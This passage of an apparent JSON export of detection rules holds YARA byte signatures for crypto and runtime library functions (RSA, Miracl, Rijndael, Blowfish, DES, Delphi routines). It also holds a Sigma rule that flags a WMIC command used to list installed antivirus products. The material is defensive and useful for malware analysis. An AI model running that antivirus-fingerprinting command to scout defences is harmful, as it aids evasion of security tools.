F3 AB 8B CB 83 E1 03 F3 AA 8D 45 02 5F 5D 5B 52 8B 94 24 94 00 00 00 C6 44 04 08 00 8D 44 04 09 52 50 E8 ?? ?? ?? ?? 8B 8C 24 A4 00 00 00 8B 84 24 98 00 00 00 51 8B 8C 24 98 00 00 00 8D 54 24 14 56 52 50 51 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_RsaPublicDecrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 RsaPublicDecrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 14 81 EC 84 00 00 00 8B 8C 24 94 00 00 00 56 8B 30 83 C6 07 C1 EE 03 3B CE 76 0D B8 06 04 00 00 5E 81 C4 84 00 00 00 C3 50 8B 84 24 98 00 00 00 51 8D 4C 24 0C 50 8D 54 24 14 51 52 E8 ?? ?? ?? ?? 
83 C4 14 85 C0 0F 85 8E 00 00 00 39 74 24 04 74 0D B8 06 04 00 00 5E 81 C4 84 00 00 00 C3 8A 44 24 08 84 C0 75 6E 80 7C 24 09 01 75 67 B8 02 00 00 00 8D 4E FF 3B C8 76 0D B2 FF 38 54 04 08 75 05 40 3B C1 72 F5 8A 4C 04 08 40 84 C9 75 45 8B 94 24 ?? 00 00 00 8B CE 2B C8 89 0A }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_RsaPublicEncrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 RsaPublicEncrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 14 81 EC 84 00 00 00 53 8B 9C 24 98 00 00 00 57 8B 38 83 C7 07 8D 4B 0B C1 EF 03 3B CF 76 0E 5F B8 06 04 00 00 5B 81 C4 84 00 00 00 C3 8B D7 55 2B D3 56 BE 02 00 00 00 C6 44 24 14 00 8D 6A FF C6 44 24 15 02 3B EE 76 28 8B 84 24 AC 00 00 00 8D 4C 24 13 50 6A 01 51 E8 ?? ?? ?? ?? 8A 44 24 1F 83 C4 0C 84 C0 74 E1 88 44 34 14 46 3B F5 72 D8 8B 94 24 A0 00 00 00 53 8D 44 34 19 52 50 C6 44 34 20 00 E8 ?? ?? ?? ?? 8B 8C 24 B4 00 00 00 8B 84 24 A8 00 00 00 51 8B 8C 24 A8 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaEuro_NN_modInv\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaEuro NN_modInv\"\r\n\tstrings:\r\n\t\t$c0 = { 81 EC A4 04 00 00 53 56 8B B4 24 BC 04 00 00 57 8D 44 24 0C 56 50 E8 ?? ?? ?? ?? 8D 8C 24 1C 01 00 00 BF 01 00 00 00 56 51 89 7C 24 1C E8 ?? ?? ?? ?? 8B 94 24 C8 04 00 00 56 8D 84 24 AC 01 00 00 52 50 E8 ?? ?? ?? ?? 8B 9C 24 D8 04 00 00 56 8D 8C 24 B0 00 00 00 53 51 E8 ?? ?? ?? ?? 8D 94 24 B8 00 00 00 56 52 E8 ?? ?? ?? ?? 83 C4 30 85 C0 0F 85 F8 00 00 00 8D 84 24 ?? 00 00 00 56 50 8D 8C 24 A0 01 00 00 56 8D 94 24 AC 02 00 00 51 8D 84 24 34 03 00 00 52 50 E8 ?? ?? ?? ?? 8D 8C }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaEuro_NN_modMult\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaEuro NN_modMult\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 0C 8B 4C 24 08 81 EC 08 01 00 00 8D 54 24 00 56 8B B4 24 20 01 00 00 56 50 51 52 E8 ?? ?? ?? ?? 8B 84 24 2C 01 00 00 56 8D 0C 36 50 8B 84 24 28 01 00 00 8D 54 24 1C 51 52 50 E8 ?? ?? ?? ?? 
83 C4 24 5E 81 C4 08 01 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Miracl_Big_constructor\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl Big constructor\"\r\n\tstrings:\r\n\t\t$c0 = { 56 8B F1 6A 00 E8 ?? ?? ?? ?? 83 C4 04 89 06 8B C6 5E C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Miracl_mirvar\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl mirvar\"\r\n\tstrings:\r\n\t\t$c0 = { 56 E8 ?? ?? ?? ?? 8B 88 18 02 00 00 85 C9 74 04 33 C0 5E C3 8B 88 8C 00 00 00 85 C9 75 0E 6A 12 E8 ?? ?? ?? ?? 83 C4 04 33 C0 5E C3 8B 80 38 02 00 00 6A 01 50 E8 ?? ?? ?? ?? 8B F0 83 C4 08 85 F6 75 02 5E C3 8D 46 04 8B C8 8B D0 83 E1 03 2B D1 83 C2 08 89 10 8B 44 24 08 85 C0 74 0A 56 50 E8 ?? ?? ?? ?? 83 C4 08 8B C6 5E C3 }\r\n\t\t$c1 = { 56 57 E8 ?? ?? ?? ?? 8B F0 8B 86 2C 02 00 00 85 C0 74 05 5F 33 C0 5E C3 8B 56 1C 42 8B C2 89 56 1C 83 F8 18 7D 17 C7 44 86 20 17 00 00 00 8B 86 40 02 00 00 85 C0 74 05 E8 ?? ?? ?? ?? 8B 86 8C 00 00 00 85 C0 75 16 6A 12 E8 ?? ?? ?? ?? 8B 46 1C 83 C4 04 48 89 46 1C 5F 33 C0 5E C3 8B 46 18 6A 01 8D 0C 85 0C 00 00 00 51 E8 ?? ?? ?? ?? 8B F8 83 C4 08 85 FF 75 0C 8B 46 1C 5F 48 89 46 1C 33 C0 5E C3 8D 47 04 8B D0 8B C8 83 E2 03 2B CA 83 C1 08 89 08 8B 44 24 0C 85 C0 74 0A 57 50 E8 }\r\n\t\t$c2 = { 56 57 E8 ?? ?? ?? ?? 8B F0 8B 86 18 02 00 00 85 C0 74 05 5F 33 C0 5E C3 8B 56 1C 42 8B C2 89 56 1C 83 F8 18 7D 17 C7 44 86 20 17 00 00 00 8B 86 2C 02 00 00 85 C0 74 05 E8 ?? ?? ?? ?? 8B 86 8C 00 00 00 85 C0 75 16 6A 12 E8 ?? ?? ?? ?? 8B 46 1C 83 C4 04 48 89 46 1C 5F 33 C0 5E C3 8B 86 A4 02 00 00 6A 01 50 E8 ?? ?? ?? ?? 8B F8 83 C4 08 85 FF 75 0C 8B 46 1C 5F 48 89 46 1C 33 C0 5E C3 8D 47 04 8B C8 8B D0 83 E1 03 2B D1 83 C2 08 89 10 8B 44 24 0C 85 C0 74 0A 57 50 E8 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Miracl_mirsys_init\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl mirsys init\"\r\n\tstrings:\r\n\t\t$c0 = { 53 55 57 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 DB A3 ?? ?? ?? 
?? 3B C3 75 06 5F 5D 33 C0 5B C3 89 58 1C A1 ?? ?? ?? ?? BD 01 00 00 00 89 58 20 A1 ?? ?? ?? ?? 8B 50 1C 42 89 50 1C A1 ?? ?? ?? ?? 8B 48 1C C7 44 88 20 1D 00 00 00 8B 15 ?? ?? ?? ?? 89 9A 14 02 00 00 A1 ?? ?? ?? ?? 89 98 70 01 00 00 8B 0D ?? ?? ?? ?? 89 99 78 01 00 00 8B 15 ?? ?? ?? ?? 89 9A 98 01 00 00 A1 ?? ?? ?? ?? 89 58 14 8B 44 24 14 3B C5 0F 84 6C 05 00 00 3D 00 00 00 80 0F 87 61 05 00 00 50 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n/* //disabled - gives many false positives (sorry Storm Shadow): 30 82 ?? ?? is only a long-form DER SEQUENCE header, so the cert rule hits any nested DER/ASN.1 blob and the PKCS#8 rule any DER structure whose first element is INTEGER 0, not just X.509 certs and private keys\r\nrule x509_public_key_infrastructure_cert\r\n{\tmeta:\r\n\t\tdesc = \"X.509 PKI Certificate\"\r\n\t\text = \"crt\"\r\n\tstrings:\r\n\t\t$c0 = { 30 82 ?? ?? 30 82 ?? ?? }\r\n\tcondition: \r\n\t\t$c0\r\n}\r\n\r\nrule pkcs8_private_key_information_syntax_standard\r\n{\tmeta:\r\n\t\tdesc = \"Found PKCS #8: Private-Key\"\r\n\t\text = \"key\"\r\n\tstrings: \r\n\t\t$c0 = { 30 82 ?? ?? 02 01 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n*/\r\n\r\nrule BASE64_table {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Base64 table\"\r\n\t\tdate = \"2015-07\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Delphi_Random {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Delphi Random function (LCG with multiplier 0x08088405 - not a cryptographic PRNG)\"\r\n\t\tdate = \"2015-08\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 31 DB 69 93 ?? ?? ?? ?? 05 84 08 08 42 89 93 ?? ?? ?? ?? F7 E2 89 D0 5B C3 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 8B 05 ?? ?? ?? ?? 69 C0 05 84 08 08 83 C0 01 89 05 ?? ?? ?? ?? 
8B C9 8B C0 48 0F AF C8 48 C1 E9 20 89 C8 C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_RandomRange {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for RandomRange function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 56 8B F2 8B D8 3B F3 7D 0E 8B C3 2B C6 E8 ?? ?? ?? ?? 03 C6 5E 5B C3 8B C6 2B C3 E8 ?? ?? ?? ?? 03 C3 5E 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Delphi_FormShow {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Form.Show function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 8B D8 B2 01 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 5B C3 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 53 48 83 EC 20 48 89 CB 48 89 D9 B2 01 E8 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 83 C4 20 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_CompareCall {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Compare string function\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 57 89 C6 89 D7 39 D0 0F 84 8F 00 00 00 85 F6 74 68 85 FF 74 6B 8B 46 FC 8B 57 FC 29 D0 77 02 01 C2 52 C1 EA 02 74 26 8B 0E 8B 1F 39 D9 75 58 4A 74 15 8B 4E 04 8B 5F 04 39 D9 75 4B 83 C6 08 83 C7 08 4A 75 E2 EB 06 83 C6 04 83 C7 04 5A 83 E2 03 74 22 8B 0E 8B 1F 38 D9 75 41 4A 74 17 38 FD 75 3A 4A 74 10 81 E3 00 00 FF 00 81 E1 00 00 FF 00 39 D9 75 27 01 C0 EB 23 8B 57 FC 29 D0 EB 1C 8B 46 FC 29 D0 EB 15 5A 38 D9 75 10 38 FD 75 0C C1 E9 10 C1 EB 10 38 D9 75 02 38 FD 5F 5E 5B C3 }\r\n\t\t//newer delphi\r\n\t\t$c1 = { 39 D0 74 30 85 D0 74 22 8B 48 FC 3B 4A FC 75 24 01 C9 01 C8 01 CA F7 D9 53 8B 1C 01 3B 1C 11 75 07 83 C1 04 78 F3 31 C0 5B C3}\r\n\t\t//x64\r\n\t\t$c2 = { 41 56 41 55 57 56 53 48 83 EC 20 48 89 D3 48 3B CB 75 05 48 33 C0 EB 74 48 85 C9 75 07 8B 43 FC F7 D8 EB 68 48 85 DB 75 05 8B 41 FC EB 5E 8B 79 FC 44 8B 6B FC 89 FE 41 3B F5 7E 03 44 89 EE E8 ?? ?? ?? ?? 49 89 C6 48 89 D9 E8 ?? ?? ?? ?? 
48 89 C1 85 F6 7E 30 41 0F B7 06 0F B7 11 2B C2 85 C0 75 29 83 FE 01 74 1E 41 0F B7 46 02 0F B7 51 02 2B C2 85 C0 75 15 49 83 C6 04 48 83 C1 04 83 EE 02 85 F6 7F D0 90 8B C7 41 2B C5 48 83 C4 20 5B 5E 5F 41 5D 41 5E C3 }\r\n \tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_Copy {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Copy function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 85 C0 74 2D 8B 58 FC 85 DB 74 26 4A 7C 1B 39 DA 7D 1F 29 D3 85 C9 7C 19 39 D9 7F 11 01 C2 8B 44 24 08 E8 ?? ?? ?? ?? EB 11 31 D2 EB E5 89 D9 EB EB 8B 44 24 08 E8 ?? ?? ?? ?? 5B C2 04 00 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 53 48 83 EC 20 48 89 CB 44 89 C0 48 33 C9 48 85 D2 74 03 8B 4A FC 83 F8 01 7D 05 48 33 C0 EB 09 83 E8 01 3B C1 7E 02 89 C8 45 85 C9 7D 05 48 33 C9 EB 0A 2B C8 41 3B C9 7E 03 44 89 C9 49 89 D8 48 63 C0 48 8D 14 42 89 C8 4C 89 C1 41 89 C0 E8 ?? ?? ?? ?? 48 89 D8 48 83 C4 20 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_IntToStr {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for IntToStr function\"\r\n\t\tdate = \"2016-04\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 00 FF FF FF 53 56 8B F2 8B D8 FF 75 0C FF 75 08 8D 85 00 FF FF FF E8 ?? ?? ?? ?? 8D 95 00 FF FF FF 8B C6 E8 ?? ?? ?? ?? EB 0E 8B 0E 8B C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 06 E8 ?? ?? ?? ?? 33 D2 8A D3 3B C2 72 E3 5E 5B 8B E5 5D C2 08 00 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 53 48 83 EC 20 48 89 CB 48 85 D2 7D 10 48 89 D9 48 F7 DA 41 B0 01 E8 ?? ?? ?? ?? EB 0B 48 89 D9 4D 33 C0 E8 ?? ?? ?? ?? 48 89 D8 48 83 C4 20 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\n\r\nrule Delphi_StrToInt {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for StrToInt function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 83 C4 F4 8B D8 8B D4 8B C3 E8 ?? ?? ?? ?? 8B F0 83 3C 24 00 74 19 89 5C 24 04 C6 44 24 08 0B 8D 54 24 04 A1 ?? 
?? ?? ?? 33 C9 E8 ?? ?? ?? ?? 8B C6 83 C4 0C 5E 5B C3 }\r\n\t\t//x64 rad\r\n\t\t$c1 = { 55 56 53 48 83 EC 40 48 8B EC 48 89 CB 48 89 D9 48 8D 55 3C E8 ?? ?? ?? ?? 89 C6 83 7D 3C 00 74 1B 48 89 5D 20 C6 45 28 11 48 8B 0D ?? ?? ?? ?? 48 8D 55 20 4D 33 C0 E8 ?? ?? ?? ?? 89 F0 48 8D 65 40 5B 5E 5D C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule Delphi_DecodeDate {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DecodeDate (DecodeDateFully) function\"\r\n\t\tdate = \"2016-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E8 53 56 89 4D F4 89 55 F8 89 45 FC 8B 5D 08 FF 75 10 FF 75 0C 8D 45 E8 E8 ?? ?? ?? ?? 8B 4D EC 85 C9 7F 24 8B 45 FC 66 C7 00 00 00 8B 45 F8 66 C7 00 00 00 8B 45 F4 66 C7 00 00 00 66 C7 03 00 00 33 D2 E9 F2 00 00 00 8B C1 BE 07 00 00 00 99 F7 FE 42 66 89 13 49 66 BB 01 00 81 F9 B1 3A 02 00 7C 13 81 E9 B1 3A 02 00 66 81 C3 90 01 81 F9 B1 3A 02 00 7D ED 8D 45 F2 50 8D 45 F0 66 BA AC 8E 91 E8 ?? ?? ?? ?? 66 83 7D F0 04 75 0A 66 FF 4D F0 66 81 45 F2 AC 8E 66 6B 45 F0 64 66 03 D8 8D 45 F2 50 8D 4D F0 0F B7 45 F2 66 BA B5 05 E8 ?? ?? ?? ?? 66 8B 45 F0 C1 E0 02 66 03 D8 8D 45 F2 50 8D 4D F0 0F B7 45 F2 66 BA 6D 01 E8 ?? ?? ?? ?? 66 83 7D F0 04 75 0A 66 FF 4D F0 66 81 45 F2 6D 01 66 03 5D F0 8B C3 E8 ?? ?? ?? ?? 8B D0 33 C0 8A C2 8D 04 40 8D 34 C5 ?? ?? ?? ?? 66 B8 01 00 0F B7 C8 66 8B 4C 4E FE 66 89 4D F0 66 8B 4D F2 66 3B 4D F0 72 0B 66 8B 4D F0 66 29 4D F2 40 EB DF 8B 4D FC 66 89 19 8B 4D F8 66 89 01 66 8B 45 F2 40 8B 4D F4 66 89 01 8B C2 5E 5B 8B E5 5D C2 0C 00 }\r\n\t\t//x64\r\n\t\t$c1 = { 55 41 55 57 56 53 48 83 EC 30 48 8B EC 48 89 D3 4C 89 C6 4C 89 CF E8 ?? ?? ?? ?? 
48 8B C8 48 C1 E9 20 85 C9 7F 23 66 C7 03 00 00 66 C7 06 00 00 66 C7 07 00 00 48 8B 85 80 00 00 00 66 C7 00 00 00 48 33 C0 E9 19 01 00 00 4C 8B 85 80 00 00 00 41 C7 C1 07 00 00 00 8B C1 99 41 F7 F9 66 83 C2 01 66 41 89 10 83 E9 01 66 41 BD 01 00 81 F9 B1 3A 02 00 7C 14 81 E9 B1 3A 02 00 66 41 81 C5 90 01 81 F9 B1 3A 02 00 7D EC 90 66 BA AC 8E 4C 8D 45 2C 4C 8D 4D 2E E8 ?? ?? ?? ?? 66 83 7D 2C 04 75 0B 66 83 6D 2C 01 66 81 45 2E AC 8E 66 6B 45 2C 64 66 44 03 E8 0F B7 4D 2E 66 BA B5 05 4C 8D 45 2C 4C 8D 4D 2E E8 ?? ?? ?? ?? 48 0F B7 45 2C 03 C0 03 C0 66 44 03 E8 0F B7 4D 2E 66 BA 6D 01 4C 8D 45 2C 4C 8D 4D 2E E8 ?? ?? ?? ?? 66 83 7D 2C 04 75 0B 66 83 6D 2C 01 66 81 45 2E 6D 01 66 44 03 6D 2C 44 89 E9 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 0F B6 D0 48 8D 14 52 48 8D 14 D1 66 B9 01 00 4C 0F B7 C1 4E 0F B7 44 42 FE 66 44 89 45 2C 4C 0F B7 45 2E 66 44 3B 45 2C 72 10 4C 0F B7 45 2C 66 44 29 45 2E 66 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\n\r\nrule Unknown_Random {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Random function\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 52 8B 45 08 69 15 ?? ?? ?? ?? 05 84 08 08 42 89 15 ?? ?? ?? ?? F7 E2 8B C2 5A C9 C2 04 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule VC6_Random {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Random function\"\r\n\t\tdate = \"2016-02\"\r\n\tstrings:\r\n\t\t$c0 = { A1 ?? ?? ?? ?? 69 C0 FD 43 03 00 05 C3 9E 26 00 A3 ?? ?? ?? ?? C1 F8 10 25 FF 7F 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule VC8_Random {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for Random function\"\r\n\t\tdate = \"2016-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { E8 ?? ?? ?? ?? 
8B 48 14 69 C9 FD 43 03 00 81 C1 C3 9E 26 00 89 48 14 8B C1 C1 E8 10 25 FF 7F 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DCP_RIJNDAEL_Init {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP RijnDael Init\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 51 53 56 57 89 4D FC 8B FA 8B D8 8B 75 08 56 8B D7 8B 4D FC 8B C3 E8 ?? ?? ?? ?? 8B D7 8B 4D FC 8B C3 8B 38 FF 57 ?? 85 F6 75 25 8D 43 38 33 C9 BA 10 00 00 00 E8 ?? ?? ?? ?? 8D 4B 38 8D 53 38 8B C3 8B 30 FF 56 ?? 8B C3 8B 10 FF 52 ?? EB 16 8D 53 38 8B C6 B9 10 00 00 00 E8 ?? ?? ?? ?? 8B C3 8B 10 FF 52 ?? 5F 5E 5B 59 5D C2 04 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DCP_RIJNDAEL_EncryptECB {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP RijnDael EncryptECB\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 57 55 83 C4 B4 89 0C 24 8D 74 24 08 8D 7C 24 28 80 78 30 00 75 16 B9 ?? ?? ?? ?? B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0A 89 0F 8B CA 83 C1 04 8B 09 8D 5F 04 89 0B 8B CA 83 C1 08 8B 09 8D 5F 08 89 0B 83 C2 0C 8B 12 8D 4F 0C 89 11 8B 50 58 83 EA 02 85 D2 0F 82 3B 01 00 00 42 89 54 24 04 33 D2 8B 0F 8B DA C1 E3 02 33 4C D8 5C 89 0E 8D 4F 04 8B 09 33 4C D8 60 8D 6E 04 89 4D 00 8D 4F 08 8B 09 33 4C D8 64 8D 6E 08 89 4D 00 8D 4F 0C 8B 09 33 4C D8 68 8D 5E 0C 89 0B 33 C9 8A 0E 8D 0C 8D }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DCP_BLOWFISH_Init {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP Blowfish Init\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 57 55 8B F2 8B F8 8B CF B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B C3 8B 10 FF 52 34 8B C6 E8 ?? ?? ?? ?? 50 8B C6 E8 ?? ?? ?? ?? 8B D0 8B C3 59 8B 30 FF 56 3C 8B 43 3C 85 C0 79 03 83 C0 07 C1 F8 03 E8 ?? ?? ?? ?? 
8B F0 8B D6 8B C3 8B 08 FF 51 40 8B 47 40 8B 6B 3C 3B C5 7D 0F 6A 00 8B C8 8B D6 8B C7 8B 38 FF 57 30 EB 0D 6A 00 8B D6 8B CD 8B C7 8B 38 FF 57 30 8B 53 3C 85 D2 79 03 83 C2 07 C1 FA 03 8B C6 B9 FF 00 00 00 E8 ?? ?? ?? ?? 8B 53 3C 85 D2 79 03 83 C2 07 C1 FA 03 8B C6 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 5D 5F 5E 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule DCP_BLOWFISH_EncryptCBC {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP Blowfish EncryptCBC\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F0 53 56 57 89 4D F8 89 55 FC 8B D8 80 7B 34 00 75 16 B9 ?? ?? ?? ?? B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D 08 85 FF 79 03 83 C7 07 C1 FF 03 85 FF 7E 56 BE 01 00 00 00 6A 08 8B 45 FC 8B D6 4A C1 E2 03 03 C2 8D 4D F0 8D 53 54 E8 ?? ?? ?? ?? 8D 4D F0 8D 55 F0 8B C3 E8 ?? ?? ?? ?? 8B 55 F8 8B C6 48 C1 E0 03 03 D0 8D 45 F0 B9 08 00 00 00 E8 ?? ?? ?? ?? 8D 53 54 8D 45 F0 B9 08 00 00 00 E8 ?? ?? ?? ?? 46 4F 75 AF 8B 75 08 81 E6 07 00 00 80 79 05 4E 83 CE F8 46 85 F6 74 26 8D 4D F0 8D 53 54 8B C3 E8 ?? ?? ?? ?? 56 8B 4D F8 03 4D 08 2B CE 8B 55 FC 03 55 08 2B D6 8D 45 F0 E8 ?? ?? ?? ?? 8D 45 F0 B9 FF 00 00 00 BA 08 00 00 00 E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2 04 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule DCP_DES_Init {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP Des Init\"\r\n\t\tdate = \"2016-02\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 51 53 56 57 89 4D FC 8B FA 8B D8 8B 75 08 56 8B D7 8B 4D FC 8B C3 E8 FE F9 FF FF 8B D7 8B 4D FC 8B C3 8B 38 FF 57 5C 85 F6 75 25 8D 43 38 33 C9 BA 08 00 00 00 E8 F3 A9 FA FF 8D 4B 38 8D 53 38 8B C3 8B 30 FF 56 6C 8B C3 8B 10 FF 52 48 EB 16 8D 53 38 8B C6 B9 08 00 00 00 E8 6E A7 FA FF 8B C3 8B 10 FF 52 48 5F 5E 5B 59 5D C2 04 00 }\r\n\t\t$c1 = { 55 8B EC 51 53 56 57 89 4D FC 8B FA 8B D8 8B 75 08 56 8B D7 8B 4D FC 8B C3 E8 EE D4 FF FF 8B D7 8B 4D FC 8B C3 8B 38 FF 57 74 85 F6 75 2B 8D 43 40 B9 FF 00 00 00 BA 08 00 00 00 E8 ?? ?? ?? ?? 
8D 4B 40 8D 53 40 8B C3 8B 30 FF 96 84 00 00 00 8B C3 8B 10 FF 52 58 EB 16 8D 53 40 8B C6 B9 08 00 00 00 E8 ?? ?? ?? ?? 8B C3 8B 10 FF 52 58 5F 5E 5B 59 5D C2 04 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\n\r\nrule DCP_DES_EncryptECB {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for DCP Des EncryptECB\"\r\n\t\tdate = \"2016-02\"\r\n\tstrings:\r\n\t\t$c0 = { 53 80 78 ?? 00 75 16 B9 ?? ?? ?? 00 B2 01 A1 ?? ?? ?? 00 E8 ?? ?? ?? FF E8 ?? ?? ?? FF 8D 58 ?? 53 E8 ?? ?? FF FF 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "fingerprint_av",
            "rule": "title: Get antivirus details via WMIC query\r\nstatus: experimental\r\ndescription: Get antivirus details via WMIC query\r\nauthor: Joe Security\r\ndate: 2020-03-27\r\nid: 200069\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:\r\n          CommandLine:\r\n              - '*wmic * path antivirusproduct get displayname*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "gettickcount",
